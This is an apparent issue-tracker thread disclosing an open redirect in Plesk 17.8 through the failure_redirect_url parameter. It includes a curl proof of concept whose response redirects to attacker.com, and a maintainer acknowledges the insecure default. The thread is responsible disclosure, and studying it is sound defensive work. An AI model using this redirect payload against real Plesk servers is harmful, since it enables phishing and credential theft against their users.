Security issue - Open redirect on plesk version 17.8

[lowk3v]

Hi, I've disclosured a vunerability about open redirect on plesk version 17.8 and previous versions.
Whenever a user access the url https://trusted-plesk-url.com:8443/enterprise/rsession_init.php?failure_redirect_url=https://attacker.com, it would be redirected to the url https://attacker.com.
POC:

$ curl -I https://trusted-plesk-url.com:8443/enterprise/rsession_init.php?failure_redirect_url=https://attacker.com --insecure 
HTTP/1.1 303 See Other
Server: sw-cp-server
Date: Sun, 30 Sep 2018 04:50:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Fri, 28 May 1999 00:00:00 GMT
Last-Modified: Sun, 30 Sep 2018 04:50:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; secure; HttpOnly
Location: https://attacker.com

This issue has warned in your documents. But, by default, this feature isn't configured and web applications and users could be involved.

Affect:
This issue can cause potential phishing attacks when attackers can modify trusted URL input to malicious sites, and they may successfully launch a phishing scam and steal user credentials.

Recommend:
This feature MUST be configured following document . This is COMPULSORY step that could enhance security for web applications and users.

P/S: sorry for my bad english.

[AndreyMZ]

Hello,
Thank you for the report!

I agree that the default value of the security.trustedRedirectHosts setting should be secure. This security improvement in Plesk is registered as PFSI-61220.

However, this issue is not related to Dockerfiles for Plesk, so it should be closed.

[mrsombre]

Closed. Please, visit https://talk.plesk.com for direct support by plesk team.